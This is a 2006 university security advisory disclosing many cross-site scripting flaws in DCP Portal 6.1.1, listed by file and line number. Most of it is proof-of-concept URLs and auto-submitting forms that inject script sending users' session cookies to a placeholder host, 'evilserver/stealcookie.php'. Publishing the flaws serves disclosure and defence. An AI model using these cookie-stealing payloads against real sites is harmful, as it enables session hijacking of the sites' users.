<<< Date Index >>>     <<< Thread Index >>>

DCP Portal: Multiple XSS Vulnerabilities



===========================================================
DCP Portal: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-001, March 9, 2006
===========================================================


Affected applications
----------------------

DCP Portal (www.dcp-portal.com)

Versions 6.1.1 and prior.


Description
------------

There are multiple cross-site scripting (XSS) vulnerabilities which can be 
verified by using the following exploits (the user needs to be logged in). They 
are roughly sorted by entry points (i.e., the names of the files that have to 
be navigated).The vulnerabilities were discovered under the assumption that 
register_globals is on, and that magic_quotes_gpc is off. 


index.php
-----------

- index.php, 380:

  
http://localhost/dcp-portal611/index.php?page=documents&dl=xyz&its_url=xyz.html";><script
 
type="text/javascript">document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- index.php, 690:
  
http://localhost/dcp-portal611/index.php?page=send_write&url=xyz.html";><script 
type="text/javascript">document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>


calendar.php
-------------

- 52:
  
http://localhost/dcp-portal611/calendar.php?subject_color=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- 52:
  
http://localhost/dcp-portal611/calendar.php?images=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- 55: like 52

- 62:
  
http://localhost/dcp-portal611/calendar.php?day=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
 
  
- 77:

  <form 
action='http://localhost/dcp-portal611/calendar.php?show=full_month&month=02&day=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
 method="post">
    <input type="text" name="year" value='2006' />
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

- 86: 
  using $_REQUEST['year'], 'month' or 'day':
  
http://localhost/dcp-portal611/calendar.php?year=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- 92: analogous to lines 52 und 55 ($images)

- 149: $_REQUEST['year'] again

- 151: $_REQUEST['year'] again

- between lines 199 and 219: $_REQUEST[*] again (nine times)

- 223:
  echoing the value returned by function PrintCalendar (composes its
  return value from $_REQUEST[*])

- 255: repeat

- 230: $subject_color, like 52

- 255: $_REQUEST['year']

- 257: $_REQUEST['year']

- 261: $_REQUEST['day']


forums.php
------------


- 95:
  
  <form action='http://localhost/dcp-portal611/forums.php?action=board&bid=1' 
method="post">
    <input type="text" name="bid" 
value='"></a><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
 />
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

- 140:
  
http://localhost/dcp-portal611/forums.php?action=board&bid=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- 191:
  
http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1&replying_msg=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
 

- 194:

  <form 
action='http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1' 
method="post">
    <input type="text" name="subject" 
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
 />
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

- 198:

  <form 
action='http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1' 
method="post">
    <input type="text" name="body" 
value='"></textarea><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
 />
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

- 207:
  
http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1&mid=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- 231:

  <form action='http://localhost/dcp-portal611/forums.php?action=savemsg' 
method="post">
    <input type="text" name="bid" 
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
 />
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>


inbox.php
-----------


- 127:

  <form action='http://localhost/dcp-portal611/inbox.php?action=send' 
method="post">
    <input type="text" name="subject" 
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
 />
    <input type="text" name="message" value='' />
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

- 133:

  <form action='http://localhost/dcp-portal611/inbox.php?action=send' 
method="post">
    <input type="text" name="message" 
value='"></textarea><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
 />
    <input type="text" name="subject" value='' />
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

- 353:
  
  <form 
action='http://localhost/dcp-portal611/inbox.php?action=delete&subject=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
 method="post">
    <input type="submit" name="submit" value='Reply'>
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

  automatic submission via JavaScript does not work here

- 359: analogous to 353

  <form 
action='http://localhost/dcp-portal611/inbox.php?action=delete&message=";></textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
 method="post">
    <input type="submit" name="submit" value='Reply'>
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>


lostpassword.php
------------------

- 63:
  
http://localhost/dcp-portal611/lostpassword.php?subject_color=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- 64:
  
http://localhost/dcp-portal611/lostpassword.php?email=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>


mycontents.php
----------------

- 88:
  
http://localhost/dcp-portal611/mycontents.php?action=content&c_name=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
  

- 93:
  
http://localhost/dcp-portal611/mycontents.php?action=content&content_inicial=</textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
 

- 126:
  
http://localhost/dcp-portal611/mycontents.php?action=content&c_name=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
  

- 155:
  
http://localhost/dcp-portal611/mycontents.php?action=addnews&c_name=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- 159:
  
http://localhost/dcp-portal611/mycontents.php?action=addnews&content_inicial=</textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
 

- 185:
  
http://localhost/dcp-portal611/mycontents.php?action=addnews&mode=write&dcp_editor_contingut_html=xyz&c_name=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>&c_image_name=

- 218:
  
http://localhost/dcp-portal611/mycontents.php?action=addanns&c_name=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>

- 222: $content_inicial again

- 248: $c_name again

- 315:
  
http://localhost/dcp-portal611/mycontents.php?action=updatecontent&cid=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
 

- 320:
  
http://localhost/dcp-portal611/mycontents.php?action=updatecontent&cid=1&mode=write&c_image_name=xyz&c_name=";><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
 

- 326: $content_inicial again

- 362: $c_name again

- 404: $action_submit, via $cid (analogous to 315)

- 414: $content_inicial again

- 444: $c_name again


search.php
------------

- 81:

  <form 
action='http://localhost/dcp-portal611/search.php?field=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
 method="post">
    <input type="text" name="q" value="xyz"/>
    <input type="text" name="query" value="true"/>
    <input type="text" name="return" value="tid, title, body"/>
    <input type="text" name="table" value="dcp5_forum_messages"/>
    <input type="text" name="id_col" value="tid"/>
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>

- 81:

  <form action='http://localhost/dcp-portal611/search.php' method="post">
    <input type="text" name="q" 
value='<script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>
 method="post">'/>
    <input type="text" name="query" value="true"/>
    <input type="text" name="return" value="tid, title, body"/>
    <input type="text" name="table" value="dcp5_forum_messages"/>
    <input type="text" name="id_col" value="tid"/>
    <input type="submit">
  </form>
  <script type="text/javascript">
    document.forms[0].submit();
  </script>


Solution
---------

The authors have not responded to our messages, so there is no solution to 
these issues yet.

Timeline:

February 19, 2006:
Vulnerabilities indicated via andy at codeworx dot ca, but no response.

March 9, 2006:
Advisory submission.


References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-001.txt


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at